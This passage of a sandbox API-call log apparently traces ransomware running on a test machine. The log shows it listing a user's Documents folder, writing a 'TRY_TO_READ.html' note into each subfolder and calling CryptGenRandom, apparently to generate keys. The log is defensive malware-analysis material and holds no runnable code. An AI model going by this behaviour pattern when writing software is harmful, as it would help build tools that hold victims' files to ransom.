	[0099.826] FindNextFileW (in: hFindFile=0x5da530, lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc87f6770, ftCreationTime.dwHighDateTime=0x1d58d3a, ftLastAccessTime.dwLowDateTime=0xd6368e30, ftLastAccessTime.dwHighDateTime=0x1d56999, ftLastWriteTime.dwLowDateTime=0xd6368e30, ftLastWriteTime.dwHighDateTime=0x1d56999, nFileSizeHigh=0x0, nFileSizeLow=0x14330, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="3NDq.pptx", cAlternateFileName="3NDQ~1.PPT")) returned 1
	[0099.826] FindNextFileW (in: hFindFile=0x5da530, lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6dfc11e0, ftCreationTime.dwHighDateTime=0x1d56c74, ftLastAccessTime.dwLowDateTime=0xfb100450, ftLastAccessTime.dwHighDateTime=0x1d54277, ftLastWriteTime.dwLowDateTime=0xfb100450, ftLastWriteTime.dwHighDateTime=0x1d54277, nFileSizeHigh=0x0, nFileSizeLow=0xb705, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="aAwNMUJrb-y Dw.pptx", cAlternateFileName="AAWNMU~1.PPT")) returned 1
	[0099.827] FindNextFileW (in: hFindFile=0x5da530, lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xefe02ba0, ftCreationTime.dwHighDateTime=0x1d5816a, ftLastAccessTime.dwLowDateTime=0xe31ec140, ftLastAccessTime.dwHighDateTime=0x1d551e2, ftLastWriteTime.dwLowDateTime=0xe31ec140, ftLastWriteTime.dwHighDateTime=0x1d551e2, nFileSizeHigh=0x0, nFileSizeLow=0x4b01, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bmmU9q.docx", cAlternateFileName="BMMU9Q~1.DOC")) returned 1
	[0099.827] FindNextFileW (in: hFindFile=0x5da530, lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x16edf7e0, ftCreationTime.dwHighDateTime=0x1d4c712, ftLastAccessTime.dwLowDateTime=0xa0889520, ftLastAccessTime.dwHighDateTime=0x1d4d507, ftLastWriteTime.dwLowDateTime=0xa0889520, ftLastWriteTime.dwHighDateTime=0x1d4d507, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="C jzW0ymnd6", cAlternateFileName="CJZW0Y~1")) returned 1
	[0099.827] CreateFileW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\C jzW0ymnd6\\TRY_TO_READ.html" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\c jzw0ymnd6\\try_to_read.html"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x380
	[0099.828] FindNextFileW (in: hFindFile=0x5da530, lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x834ff670, ftCreationTime.dwHighDateTime=0x1d4d551, ftLastAccessTime.dwLowDateTime=0x6bece920, ftLastAccessTime.dwHighDateTime=0x1d4d4e3, ftLastWriteTime.dwLowDateTime=0x6bece920, ftLastWriteTime.dwHighDateTime=0x1d4d4e3, nFileSizeHigh=0x0, nFileSizeLow=0x12c92, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="CJSmOL9U.doc", cAlternateFileName="")) returned 1
	[0099.828] FindNextFileW (in: hFindFile=0x5da530, lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d207440, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x192, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1
	[0099.828] FindNextFileW (in: hFindFile=0x5da530, lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb35fffa0, ftCreationTime.dwHighDateTime=0x1d52370, ftLastAccessTime.dwLowDateTime=0x74d1a300, ftLastAccessTime.dwHighDateTime=0x1d5184a, ftLastWriteTime.dwLowDateTime=0x74d1a300, ftLastWriteTime.dwHighDateTime=0x1d5184a, nFileSizeHigh=0x0, nFileSizeLow=0x9a8b, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="DeuDpnSB_N80.docx", cAlternateFileName="DEUDPN~1.DOC")) returned 1
	[0099.829] FindNextFileW (in: hFindFile=0x5da530, lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x753a4b50, ftCreationTime.dwHighDateTime=0x1d537c4, ftLastAccessTime.dwLowDateTime=0xdbb9d8c0, ftLastAccessTime.dwHighDateTime=0x1d5350b, ftLastWriteTime.dwLowDateTime=0xdbb9d8c0, ftLastWriteTime.dwHighDateTime=0x1d5350b, nFileSizeHigh=0x0, nFileSizeLow=0x1537, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="gY690tyyznk.pptx", cAlternateFileName="GY690T~1.PPT")) returned 1
	[0099.829] FindNextFileW (in: hFindFile=0x5da530, lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4da6c000, ftCreationTime.dwHighDateTime=0x1d4c5a0, ftLastAccessTime.dwLowDateTime=0xad5bef40, ftLastAccessTime.dwHighDateTime=0x1d4cb07, ftLastWriteTime.dwLowDateTime=0xad5bef40, ftLastWriteTime.dwHighDateTime=0x1d4cb07, nFileSizeHigh=0x0, nFileSizeLow=0x9128, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="H 8 Lqx.ots", cAlternateFileName="H8LQX~1.OTS")) returned 1
	[0099.829] FindNextFileW (in: hFindFile=0x5da530, lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xbc829e00, ftCreationTime.dwHighDateTime=0x1d4d107, ftLastAccessTime.dwLowDateTime=0x1daa9820, ftLastAccessTime.dwHighDateTime=0x1d4c7be, ftLastWriteTime.dwLowDateTime=0x1daa9820, ftLastWriteTime.dwHighDateTime=0x1d4c7be, nFileSizeHigh=0x0, nFileSizeLow=0xfebb, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="iPhc2hVu2fGA.pptx", cAlternateFileName="IPHC2H~1.PPT")) returned 1
	[0099.829] FindNextFileW (in: hFindFile=0x5da530, lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x20a0b2d0, ftCreationTime.dwHighDateTime=0x1d5612e, ftLastAccessTime.dwLowDateTime=0x2e47e3d0, ftLastAccessTime.dwHighDateTime=0x1d55522, ftLastWriteTime.dwLowDateTime=0x2e47e3d0, ftLastWriteTime.dwHighDateTime=0x1d55522, nFileSizeHigh=0x0, nFileSizeLow=0x18a74, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="JeM6Ly.xlsx", cAlternateFileName="JEM6LY~1.XLS")) returned 1
	[0099.829] FindNextFileW (in: hFindFile=0x5da530, lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x50faea60, ftCreationTime.dwHighDateTime=0x1d5376a, ftLastAccessTime.dwLowDateTime=0xa3a7b4e0, ftLastAccessTime.dwHighDateTime=0x1d561f0, ftLastWriteTime.dwLowDateTime=0xa3a7b4e0, ftLastWriteTime.dwHighDateTime=0x1d561f0, nFileSizeHigh=0x0, nFileSizeLow=0x12216, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="JgNM o 5a 6dul.docx", cAlternateFileName="JGNMO5~1.DOC")) returned 1
	[0099.829] FindNextFileW (in: hFindFile=0x5da530, lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x34c850c0, ftCreationTime.dwHighDateTime=0x1d4d17c, ftLastAccessTime.dwLowDateTime=0xff0a81b0, ftLastAccessTime.dwHighDateTime=0x1d4c67c, ftLastWriteTime.dwLowDateTime=0xff0a81b0, ftLastWriteTime.dwHighDateTime=0x1d4c67c, nFileSizeHigh=0x0, nFileSizeLow=0xca2, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="K1ruro46jVUR38fANX.ots", cAlternateFileName="K1RURO~1.OTS")) returned 1
	[0099.829] FindNextFileW (in: hFindFile=0x5da530, lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xa7920050, ftCreationTime.dwHighDateTime=0x1d4ccb4, ftLastAccessTime.dwLowDateTime=0xaf6c5b40, ftLastAccessTime.dwHighDateTime=0x1d4cdd1, ftLastWriteTime.dwLowDateTime=0xaf6c5b40, ftLastWriteTime.dwHighDateTime=0x1d4cdd1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="k1_dBv01wMM", cAlternateFileName="K1_DBV~1")) returned 1
	[0099.829] CreateFileW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\k1_dBv01wMM\\TRY_TO_READ.html" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\k1_dbv01wmm\\try_to_read.html"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x380
	[0099.830] FindNextFileW (in: hFindFile=0x5da530, lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x22034b00, ftCreationTime.dwHighDateTime=0x1d57d04, ftLastAccessTime.dwLowDateTime=0x1c906c40, ftLastAccessTime.dwHighDateTime=0x1d54607, ftLastWriteTime.dwLowDateTime=0x1c906c40, ftLastWriteTime.dwHighDateTime=0x1d54607, nFileSizeHigh=0x0, nFileSizeLow=0xeb49, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="lEYWDuoabD0KRzrS98VU.docx", cAlternateFileName="LEYWDU~1.DOC")) returned 1
	[0099.830] FindNextFileW (in: hFindFile=0x5da530, lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7e84a370, ftCreationTime.dwHighDateTime=0x1d4cd95, ftLastAccessTime.dwLowDateTime=0x8f825f20, ftLastAccessTime.dwHighDateTime=0x1d4ce92, ftLastWriteTime.dwLowDateTime=0x8f825f20, ftLastWriteTime.dwHighDateTime=0x1d4ce92, nFileSizeHigh=0x0, nFileSizeLow=0x8647, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="McK-mRigqYxDS.odt", cAlternateFileName="MCK-MR~1.ODT")) returned 1
	[0099.830] FindNextFileW (in: hFindFile=0x5da530, lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x110df3a0, ftCreationTime.dwHighDateTime=0x1d51e58, ftLastAccessTime.dwLowDateTime=0xe7355090, ftLastAccessTime.dwHighDateTime=0x1d508c8, ftLastWriteTime.dwLowDateTime=0xe7355090, ftLastWriteTime.dwHighDateTime=0x1d508c8, nFileSizeHigh=0x0, nFileSizeLow=0x426c, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="MfWYP0jQuh.xlsx", cAlternateFileName="MFWYP0~1.XLS")) returned 1
	[0099.830] FindNextFileW (in: hFindFile=0x5da530, lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x290dda00, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x290dda00, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x290dda00, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="My Music", cAlternateFileName="MYMUSI~1")) returned 1
	[0099.830] CreateFileW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Music\\TRY_TO_READ.html" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\my music\\try_to_read.html"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x380
	[0099.832] FindNextFileW (in: hFindFile=0x5da530, lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x290dda00, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x290dda00, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x290dda00, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="My Pictures", cAlternateFileName="MYPICT~1")) returned 1
	[0099.832] CreateFileW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Pictures\\TRY_TO_READ.html" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\my pictures\\try_to_read.html"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x380
	[0099.833] FindNextFileW (in: hFindFile=0x5da530, lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x9e9e4460, ftCreationTime.dwHighDateTime=0x1d305ee, ftLastAccessTime.dwLowDateTime=0x9ebad4e0, ftLastAccessTime.dwHighDateTime=0x1d305ee, ftLastWriteTime.dwLowDateTime=0x9ebad4e0, ftLastWriteTime.dwHighDateTime=0x1d305ee, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="My Shapes", cAlternateFileName="MYSHAP~1")) returned 1
	[0099.833] CreateFileW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\TRY_TO_READ.html" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\my shapes\\try_to_read.html"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x380
	[0099.836] FindNextFileW (in: hFindFile=0x5da530, lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x290dda00, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x290dda00, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x290dda00, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="My Videos", cAlternateFileName="MYVIDE~1")) returned 1
	[0099.836] CreateFileW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Videos\\TRY_TO_READ.html" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\my videos\\try_to_read.html"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x380
	[0099.837] FindNextFileW (in: hFindFile=0x5da530, lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5a7a9f80, ftCreationTime.dwHighDateTime=0x1d2fad7, ftLastAccessTime.dwLowDateTime=0x5c4f8e60, ftLastAccessTime.dwHighDateTime=0x1d2fad7, ftLastWriteTime.dwLowDateTime=0x5c4f8e60, ftLastWriteTime.dwHighDateTime=0x1d2fad7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Outlook Files", cAlternateFileName="OUTLOO~1")) returned 1
	[0099.837] CreateFileW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Outlook Files\\TRY_TO_READ.html" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\outlook files\\try_to_read.html"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x380
	[0099.838] FindNextFileW (in: hFindFile=0x5da530, lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe42eb8d0, ftCreationTime.dwHighDateTime=0x1d4c8b5, ftLastAccessTime.dwLowDateTime=0x2e5d8040, ftLastAccessTime.dwHighDateTime=0x1d4cd7e, ftLastWriteTime.dwLowDateTime=0x2e5d8040, ftLastWriteTime.dwHighDateTime=0x1d4cd7e, nFileSizeHigh=0x0, nFileSizeLow=0xc30, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="PdZfP4o9bJbZ1rQ-1.rtf", cAlternateFileName="PDZFP4~1.RTF")) returned 1
	[0099.838] FindNextFileW (in: hFindFile=0x5da530, lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2fcf8200, ftCreationTime.dwHighDateTime=0x1d589d7, ftLastAccessTime.dwLowDateTime=0xd6fe1c0, ftLastAccessTime.dwHighDateTime=0x1d542a9, ftLastWriteTime.dwLowDateTime=0xd6fe1c0, ftLastWriteTime.dwHighDateTime=0x1d542a9, nFileSizeHigh=0x0, nFileSizeLow=0xba3c, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="pqvpGC.pptx", cAlternateFileName="PQVPGC~1.PPT")) returned 1
	[0099.838] FindNextFileW (in: hFindFile=0x5da530, lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe23b840, ftCreationTime.dwHighDateTime=0x1d4cb93, ftLastAccessTime.dwLowDateTime=0x944ea5b0, ftLastAccessTime.dwHighDateTime=0x1d4d12e, ftLastWriteTime.dwLowDateTime=0x944ea5b0, ftLastWriteTime.dwHighDateTime=0x1d4d12e, nFileSizeHigh=0x0, nFileSizeLow=0x54d2, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="qokw9XeafKTvIuc7uhB.xls", cAlternateFileName="QOKW9X~1.XLS")) returned 1
	[0099.838] FindNextFileW (in: hFindFile=0x5da530, lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x352f4e00, ftCreationTime.dwHighDateTime=0x1d4d33f, ftLastAccessTime.dwLowDateTime=0xb3a375b0, ftLastAccessTime.dwHighDateTime=0x1d4c604, ftLastWriteTime.dwLowDateTime=0xb3a375b0, ftLastWriteTime.dwHighDateTime=0x1d4c604, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="rnijWLOqwHM6IwDZM", cAlternateFileName="RNIJWL~1")) returned 1
	[0099.838] CreateFileW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\rnijWLOqwHM6IwDZM\\TRY_TO_READ.html" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\rnijwloqwhm6iwdzm\\try_to_read.html"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x380
	[0099.839] FindNextFileW (in: hFindFile=0x5da530, lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x305f3850, ftCreationTime.dwHighDateTime=0x1d4cdad, ftLastAccessTime.dwLowDateTime=0xc1cade00, ftLastAccessTime.dwHighDateTime=0x1d4d1c4, ftLastWriteTime.dwLowDateTime=0xc1cade00, ftLastWriteTime.dwHighDateTime=0x1d4d1c4, nFileSizeHigh=0x0, nFileSizeLow=0x12d4f, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="SQYRtKqdVj.xls", cAlternateFileName="SQYRTK~1.XLS")) returned 1
	[0099.839] FindNextFileW (in: hFindFile=0x5da530, lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xca740790, ftCreationTime.dwHighDateTime=0x1d5956c, ftLastAccessTime.dwLowDateTime=0xca740790, ftLastAccessTime.dwHighDateTime=0x1d5956c, ftLastWriteTime.dwLowDateTime=0xca7668f0, ftLastWriteTime.dwHighDateTime=0x1d5956c, nFileSizeHigh=0x0, nFileSizeLow=0x5bb, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="TRY_TO_READ.html", cAlternateFileName="TRY_TO~1.HTM")) returned 1
	[0099.840] FindNextFileW (in: hFindFile=0x5da530, lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7251ff40, ftCreationTime.dwHighDateTime=0x1d5570f, ftLastAccessTime.dwLowDateTime=0xae577c00, ftLastAccessTime.dwHighDateTime=0x1d50f10, ftLastWriteTime.dwLowDateTime=0xae577c00, ftLastWriteTime.dwHighDateTime=0x1d50f10, nFileSizeHigh=0x0, nFileSizeLow=0xe409, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="U84ZLgY39Eff.docx", cAlternateFileName="U84ZLG~1.DOC")) returned 1
	[0099.840] FindNextFileW (in: hFindFile=0x5da530, lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5c1d6380, ftCreationTime.dwHighDateTime=0x1d52be6, ftLastAccessTime.dwLowDateTime=0x8629860, ftLastAccessTime.dwHighDateTime=0x1d51b5f, ftLastWriteTime.dwLowDateTime=0x8629860, ftLastWriteTime.dwHighDateTime=0x1d51b5f, nFileSizeHigh=0x0, nFileSizeLow=0x3325, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="VGTa.xlsx", cAlternateFileName="VGTA~1.XLS")) returned 1
	[0099.840] FindNextFileW (in: hFindFile=0x5da530, lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x174dece0, ftCreationTime.dwHighDateTime=0x1d4d4e1, ftLastAccessTime.dwLowDateTime=0x549e4560, ftLastAccessTime.dwHighDateTime=0x1d4c8c8, ftLastWriteTime.dwLowDateTime=0x549e4560, ftLastWriteTime.dwHighDateTime=0x1d4c8c8, nFileSizeHigh=0x0, nFileSizeLow=0x1d68, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="vKdtw4uWXxCy7P.pptx", cAlternateFileName="VKDTW4~1.PPT")) returned 1
	[0099.840] FindNextFileW (in: hFindFile=0x5da530, lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28a69cc0, ftCreationTime.dwHighDateTime=0x1d4c56a, ftLastAccessTime.dwLowDateTime=0xb806bf50, ftLastAccessTime.dwHighDateTime=0x1d4ccd4, ftLastWriteTime.dwLowDateTime=0xb806bf50, ftLastWriteTime.dwHighDateTime=0x1d4ccd4, nFileSizeHigh=0x0, nFileSizeLow=0x14018, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Vxw-U_YhLo9.xlsx", cAlternateFileName="VXW-U_~1.XLS")) returned 1
	[0099.840] FindNextFileW (in: hFindFile=0x5da530, lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf589e530, ftCreationTime.dwHighDateTime=0x1d5367b, ftLastAccessTime.dwLowDateTime=0x8598e5b0, ftLastAccessTime.dwHighDateTime=0x1d52ddd, ftLastWriteTime.dwLowDateTime=0x8598e5b0, ftLastWriteTime.dwHighDateTime=0x1d52ddd, nFileSizeHigh=0x0, nFileSizeLow=0x8344, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="wAycIgHJXmJyatL6r.xlsx", cAlternateFileName="WAYCIG~1.XLS")) returned 1
	[0099.840] FindNextFileW (in: hFindFile=0x5da530, lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac411860, ftCreationTime.dwHighDateTime=0x1d4cf44, ftLastAccessTime.dwLowDateTime=0xbd636a70, ftLastAccessTime.dwHighDateTime=0x1d4ce7d, ftLastWriteTime.dwLowDateTime=0xbd636a70, ftLastWriteTime.dwHighDateTime=0x1d4ce7d, nFileSizeHigh=0x0, nFileSizeLow=0x113d0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="WgfXCH WWelulA.xls", cAlternateFileName="WGFXCH~1.XLS")) returned 1
	[0099.840] FindNextFileW (in: hFindFile=0x5da530, lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe8544740, ftCreationTime.dwHighDateTime=0x1d4c860, ftLastAccessTime.dwLowDateTime=0x49cc0260, ftLastAccessTime.dwHighDateTime=0x1d4d1cb, ftLastWriteTime.dwLowDateTime=0x49cc0260, ftLastWriteTime.dwHighDateTime=0x1d4d1cb, nFileSizeHigh=0x0, nFileSizeLow=0xd47c, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="YFnu6EVJ6.odt", cAlternateFileName="YFNU6E~1.ODT")) returned 1
	[0099.840] FindNextFileW (in: hFindFile=0x5da530, lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfcf57190, ftCreationTime.dwHighDateTime=0x1d4cec5, ftLastAccessTime.dwLowDateTime=0x6e026e80, ftLastAccessTime.dwHighDateTime=0x1d4d329, ftLastWriteTime.dwLowDateTime=0x6e026e80, ftLastWriteTime.dwHighDateTime=0x1d4d329, nFileSizeHigh=0x0, nFileSizeLow=0x147c, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="zWhcyCuu7COGA9mp.doc", cAlternateFileName="ZWHCYC~1.DOC")) returned 1
	[0099.840] FindNextFileW (in: hFindFile=0x5da530, lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6f40c340, ftCreationTime.dwHighDateTime=0x1d540f8, ftLastAccessTime.dwLowDateTime=0xd2b67370, ftLastAccessTime.dwHighDateTime=0x1d593af, ftLastWriteTime.dwLowDateTime=0xd2b67370, ftLastWriteTime.dwHighDateTime=0x1d593af, nFileSizeHigh=0x0, nFileSizeLow=0x5da2, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="_ndlV.pptx", cAlternateFileName="_NDLV~1.PPT")) returned 1
	[0099.840] FindNextFileW (in: hFindFile=0x5da530, lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6f40c340, ftCreationTime.dwHighDateTime=0x1d540f8, ftLastAccessTime.dwLowDateTime=0xd2b67370, ftLastAccessTime.dwHighDateTime=0x1d593af, ftLastWriteTime.dwLowDateTime=0xd2b67370, ftLastWriteTime.dwHighDateTime=0x1d593af, nFileSizeHigh=0x0, nFileSizeLow=0x5da2, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="_ndlV.pptx", cAlternateFileName="_NDLV~1.PPT")) returned 0
	[0099.840] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x70) returned 0x5ff440
	[0099.840] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x100) returned 0x5b8568
	[0099.840] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x8) returned 0x596400
	[0099.840] CryptGenRandom (in: hProv=0x588c50, dwLen=0x20, pbBuffer=0x5b8568 | out: pbBuffer=0x5b8568) returned 1
